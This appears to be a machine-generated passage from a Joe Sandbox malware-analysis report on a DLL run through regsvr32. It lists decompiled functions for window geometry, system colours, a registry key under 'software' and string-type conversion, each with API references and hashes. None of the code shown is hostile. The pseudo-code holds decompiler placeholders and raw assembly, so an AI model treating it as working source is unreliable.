0x1002c159
0x1002c164
0x1002c166
0x1002c1fd
0x1002c1fd
0x1002c1fd
0x1002c16c
0x1002c172
0x1002c1af
0x1002c1b8
0x1002c1c5
0x1002c1d3
0x1002c1db
0x1002c1e3
0x1002c1e5
0x1002c1e5
0x00000000
0x1002c1f1
0x1002c174
0x1002c17a
0x1002c18c
0x1002c19b
0x1002c1a8
0x1002c1ab
0x1002c1ab
0x1002c1a8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetWindowRect.USER32(?), ref: 1002C150
GetWindowLongA.USER32(?,000000F0), ref: 1002C159
InflateRect.USER32 ref: 1002C1B8
GetParent.USER32(?), ref: 1002C1BF
ScreenToClient.USER32(00000000,?), ref: 1002C1D3
ScreenToClient.USER32(00000000,?), ref: 1002C1DB
InvalidateRect.USER32(00000000,?,00000000), ref: 1002C1F1

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateInvalidateLongParent
String ID:
API String ID: 1809568455-0
Opcode ID: 298983088ec88971b18fd490cec7217dd04e14969ed652eb060c3a861134db88
Instruction ID: b01dbfb6bfaf51f0b83c8094c30045b43507ecd48ddfa0d873a51b83230d0b30
Opcode Fuzzy Hash: 298983088ec88971b18fd490cec7217dd04e14969ed652eb060c3a861134db88
Instruction Fuzzy Hash: 48218B3220420AAFE305DBA8DCD6FAB73E9FB856A0F41090DF65682192D734D841C762

Uniqueness

Uniqueness Score: -1.00%

Function 10043D03 Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10043D03(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
				struct tagRECT _v20;
				int _t15;
				int _t23;
				struct HDWP__* _t25;
				struct HWND__* _t26;
				int _t27;
				long _t28;
				struct HDWP__** _t35;
				RECT* _t37;

				_t26 = _a8;
				_t15 = GetParent(_t26);
				_t35 = _a4;
				_a8 = _t15;
				if(_t35 == 0 ||  *_t35 != 0) {
					GetWindowRect(_t26,  &_v20);
					ScreenToClient(_a8,  &_v20);
					ScreenToClient(_a8,  &(_v20.right));
					_t37 = _a12;
					_t15 = EqualRect( &_v20, _t37);
					if(_t15 == 0) {
						_t23 = _t37->top;
						_t27 = _t37->left;
						_t28 = _t37->bottom;
						_push(0x14);
						if(_t35 == 0) {
							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						}
						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
						 *_t35 = _t25;
						return _t25;
					}
				}
				return _t15;
			}

0x10043d0a
0x10043d10
0x10043d16
0x10043d19
0x10043d1e
0x10043d2a
0x10043d3d
0x10043d46
0x10043d48
0x10043d50
0x10043d58
0x10043d5a
0x10043d5d
0x10043d5f
0x10043d62
0x10043d66
0x00000000
0x10043d90
0x10043d78
0x10043d7e
0x00000000
0x10043d7e
0x10043d58
0x10043d9a

APIs

GetParent.USER32(?), ref: 10043D10
GetWindowRect.USER32(?,?), ref: 10043D2A
ScreenToClient.USER32(?,?), ref: 10043D3D
ScreenToClient.USER32(?,?), ref: 10043D46
EqualRect.USER32 ref: 10043D50
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10043D78
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10043D90

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: c38554d7d761bbfee26c71fa45b635c07f4a06882705dc5dc30f3844b390bf4a
Instruction ID: 194f58ad28b967178b9713e1f88e0ee493bd6bd9d00a30f34596912c865e78b7
Opcode Fuzzy Hash: c38554d7d761bbfee26c71fa45b635c07f4a06882705dc5dc30f3844b390bf4a
Instruction Fuzzy Hash: 41112CB590021AAFE711DF69CC88EAB7BBDFF88610F10C529F919D3154E630A9008B60

Uniqueness

Uniqueness Score: -1.00%

Function 100636FD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100636FD(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10063713
0x1006371f
0x10063722
0x10063725
0x10063728
0x10063733
0x1006376d
0x1006376d
0x10063778
0x1006377d
0x1006377d
0x10063782
0x10063787
0x10063787
0x10063790

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1006372B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1006374E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1006376D
RegCloseKey.ADVAPI32(?), ref: 1006377D
RegCloseKey.ADVAPI32(?), ref: 10063787

Strings

software, xrefs: 10063715

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: e5fd3030be503a1ad89859f7e978a62b1d0db13b82c24c2560cc0da0b0f5ae02
Instruction ID: 3ffc3b61182c51a9e3a18ecae5739ffdec533920ce19f6bc1fa7485345e00899
Opcode Fuzzy Hash: e5fd3030be503a1ad89859f7e978a62b1d0db13b82c24c2560cc0da0b0f5ae02
Instruction Fuzzy Hash: 6C11E3B2901159FBDB11CB9ACD89DEFFFFDEF85740B1040AAE504A2121D7709A00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000EB06 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E1000EB06(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t18;
				intOrPtr* _t22;
				intOrPtr _t30;

				if(E1000E8C9() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						return 0;
					}
					_t22 = _a8;
					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t22 + 4)) = 0;
						 *((intOrPtr*)(_t22 + 8)) = 0;
						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t30 = 1;
						 *(_t22 + 0x10) = _t18;
						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
						if( *_t22 >= 0x48) {
							lstrcpyA(_t22 + 0x28, "DISPLAY");
						}
						return _t30;
					}
				}
				return  *0x100947e8(_a4, _a8);
			}

0x1000eb15
0x1000eb2c
0x1000eb91
0x00000000
0x1000eb91
0x1000eb2e
0x1000eb35
0x00000000
0x1000eb4e
0x1000eb4f
0x1000eb52
0x1000eb60
0x1000eb63
0x1000eb6b
0x1000eb6c
0x1000eb6d
0x1000eb73
0x1000eb74
0x1000eb75
0x1000eb78
0x1000eb7c
0x1000eb87
0x1000eb87
0x00000000
0x1000eb8d
0x1000eb35
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 1000EB44
GetSystemMetrics.USER32 ref: 1000EB5C
GetSystemMetrics.USER32 ref: 1000EB63
lstrcpyA.KERNEL32(?,DISPLAY), ref: 1000EB87

Strings

B, xrefs: 1000EB25
DISPLAY, xrefs: 1000EB81

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: 03c329dec1ab6ff86fd7fb5e873821ea9aaf8e50032a9a81cd8e857b72d19503
Instruction ID: 897f4ab9835bdb2448e09d68cea0ec2f82616507137f04857ba7820342081c5c
Opcode Fuzzy Hash: 03c329dec1ab6ff86fd7fb5e873821ea9aaf8e50032a9a81cd8e857b72d19503
Instruction Fuzzy Hash: E81173715012659BEF11DF688CC498B7FA8FF09791F128056FE09AA14AD771DD40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1002C200 Relevance: 10.5, APIs: 7, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002C200(struct HWND__* _a4) {
				struct tagRECT _v16;
				signed int _t11;
				struct HWND__* _t24;
				struct HWND__* _t25;

				_t24 = _a4;
				_t11 = GetWindowLongA(_t24, 0xfffffff0);
				GetWindowRect(_t24,  &_v16);
				InflateRect( &_v16, 1, 1);
				_t25 = GetParent(_t24);
				ScreenToClient(_t25,  &_v16);
				ScreenToClient(_t25,  &(_v16.right));
				if((_t11 & 0x00200000) != 0) {
					_v16.right.x = _v16.right.x + 1;
				}
				return ValidateRect(_t25,  &_v16);
			}

0x1002c208
0x1002c20d
0x1002c21b
0x1002c22a
0x1002c237
0x1002c245
0x1002c24d
0x1002c255
0x1002c257
0x1002c257
0x1002c26d

APIs

GetWindowLongA.USER32(?,000000F0), ref: 1002C20D
GetWindowRect.USER32(?,?), ref: 1002C21B
InflateRect.USER32 ref: 1002C22A
GetParent.USER32(?), ref: 1002C231
ScreenToClient.USER32(00000000,?), ref: 1002C245
ScreenToClient.USER32(00000000,?), ref: 1002C24D
ValidateRect.USER32(00000000,?), ref: 1002C261

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$ClientScreenWindow$InflateLongParentValidate
String ID:
API String ID: 2275295265-0
Opcode ID: 1286428e363f9683ced430424c079f1aab74c87683a092bf03b3c04846bd4ae4
Instruction ID: de735b1507d7b12b4453918d75df01112eb65f80669aec980af8fc6659d96680
Opcode Fuzzy Hash: 1286428e363f9683ced430424c079f1aab74c87683a092bf03b3c04846bd4ae4
Instruction Fuzzy Hash: F1F08172004212BFE3159B58CCC8EBF37BCFBC9721F00451AFA1992190E7349906C762

Uniqueness

Uniqueness Score: -1.00%

Function 10046C91 Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10046C91(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x10046c99
0x10046ca1
0x10046ca8
0x10046caf
0x10046cb6
0x10046cc3
0x10046cca
0x10046ccd
0x10046ccf
0x10046cd4

APIs

GetSysColor.USER32 ref: 10046C9D
GetSysColor.USER32 ref: 10046CA4
GetSysColor.USER32 ref: 10046CAB
GetSysColor.USER32 ref: 10046CB2
GetSysColor.USER32 ref: 10046CB9
GetSysColorBrush.USER32 ref: 10046CC6
GetSysColorBrush.USER32 ref: 10046CCD

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 5c52fb10be8b4b4ac44ca98d0c17cc2d2a3ce9c81ddf8a2d287e071ecd1ac019
Instruction ID: 0113e9170368ab0a482fc4213f619176c94d3ffa493a7245a817bdc2bfd7d2a8
Opcode Fuzzy Hash: 5c52fb10be8b4b4ac44ca98d0c17cc2d2a3ce9c81ddf8a2d287e071ecd1ac019
Instruction Fuzzy Hash: D7F01C719407489BEB30BF768D49B47BAE0FFC4B10F02092FD2858BA90E6B5A400DF40

Uniqueness

Uniqueness Score: -1.00%

Function 10028365 Relevance: 9.1, APIs: 6, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E10028365(int _a4, short* _a8, int _a12, short* _a16, int _a20, int _a24) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				int _v44;
				char* _v48;
				void* _v60;
				int _t47;
				int _t48;
				int _t60;
				short* _t70;
				void* _t71;
				int _t80;
				signed short* _t81;
				int _t82;
				intOrPtr _t83;
				char* _t84;
				short* _t86;

				_push(0xffffffff);
				_push(0x100812e0);
				_push(E10022B50);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t83;
				_t84 = _t83 - 0x1c;
				_v28 = _t84;
				_t47 =  *0x100952dc;
				if(_t47 != 0) {
					L6:
					if(_t47 != 1) {
						if(_t47 != 2) {
							goto L22;
						} else {
							if(_a20 == 0) {
								_a20 =  *0x1009505c;
							}
							_t80 = WideCharToMultiByte(_a20, 0x220, _a8, _a12, 0, 0, 0, 0);
							_v44 = _t80;
							if(_t80 == 0) {
								goto L22;
							} else {
								_v8 = 0;
								E1001B2B0(_t49 + 0x00000003 & 0x000000fc, _t71);
								_v28 = _t84;
								_v48 = _t84;
								E1001AB60(_t84, 0, _t80);
								_t86 = _t84 + 0xc;
								_v8 = _v8 | 0xffffffff;
								if(_v48 == 0 || WideCharToMultiByte(_a20, 0x220, _a8, _a12, _v48, _t80, 0, 0) == 0) {
									goto L22;
								} else {
									_v8 = 1;
									_t26 = _t80 + 2; // 0x2
									E1001B2B0(_t80 + _t26 + 0x00000003 & 0x000000fc, _t71);
									_v28 = _t86;
									_t70 = _t86;
									_v40 = _t70;
									_v8 = _v8 | 0xffffffff;
									if(_t70 == 0) {
										goto L22;
									} else {
										_t60 = _a24;
										if(_t60 == 0) {
											_t60 =  *0x1009504c;
										}
										_t77 = _a12 + _a12;
										_t81 = _a12 + _a12 + _t70;
										 *_t81 =  *_t81 | 0x0000ffff;
										 *(_t81 - 2) =  *(_t81 - 2) | 0x0000ffff;
										_v36 = GetStringTypeA(_t60, _a4, _v48, _v44, _t70);
										if( *(_t81 - 2) == 0xffff ||  *_t81 != 0xffff) {
											goto L22;
										} else {
											E1001B7F0(_a16, _t70, _t77);
											_t48 = _v36;
										}
									}
								}
							}
						}
					} else {
						_t48 = GetStringTypeW(_a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t82 = 1;
					if(GetStringTypeW(_t82, 0x10080700, _t82, ??) == 0) {
						if(GetStringTypeA(0, _t82, 0x100806fc, _t82,  &_v32) == 0) {
							L22:
							_t48 = 0;
						} else {
							_t47 = 2;
							goto L5;
						}
					} else {
						_t47 = _t82;
						L5:
						 *0x100952dc = _t47;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t48;
			}

0x10028368
0x1002836a
0x1002836f
0x1002837a
0x1002837b
0x10028382
0x10028388
0x1002838b
0x10028394
0x100283d4
0x100283d7
0x100283f3
0x00000000
0x100283f9
0x100283fc
0x10028403
0x10028403
0x1002841e
0x10028420
0x10028425
0x00000000
0x1002842b
0x1002842b
0x10028433
0x10028438
0x1002843d
0x10028443
0x10028448
0x1002844b
0x10028467
0x00000000
0x1002848f
0x1002848f
0x10028496
0x1002849f
0x100284a4
0x100284a7
0x100284a9
0x100284b9
0x100284bf
0x00000000
0x100284c1
0x100284c1
0x100284c6
0x100284c8
0x100284c8
0x100284d0
0x100284d3
0x100284d6
0x100284db
0x100284f2
0x100284fb
0x00000000
0x10028504
0x10028509
0x10028511
0x10028511
0x100284fb
0x100284bf
0x10028467
0x10028425
0x100283d9
0x100283e5
0x100283e5
0x10028396
0x10028399
0x1002839c
0x100283ac
0x100283c6
0x10028516
0x10028516
0x100283cc
0x100283ce
0x00000000
0x100283ce
0x100283ae
0x100283ae
0x100283cf
0x100283cf
0x00000000
0x100283cf
0x100283ac
0x1002851e
0x10028529

APIs

GetStringTypeW.KERNEL32(00000001,10080700,00000001,10026048,?,00000100,00000000,10026048,00000001,?,00000100,?,00000000,00000000), ref: 100283A4
GetStringTypeA.KERNEL32(00000000,00000001,100806FC,00000001,?), ref: 100283BE
GetStringTypeW.KERNEL32(00000000,?,00000100,?,?,00000100,00000000,10026048,00000001,?,00000100,?,00000000,00000000), ref: 100283E5
WideCharToMultiByte.KERNEL32(00000001,00000220,?,00000100,00000000,00000000,00000000,00000000,?,00000100,00000000,10026048,00000001,?,00000100,?), ref: 10028418
WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 10028481
GetStringTypeA.KERNEL32(?,?,?,?), ref: 100284EC

Memory Dump Source

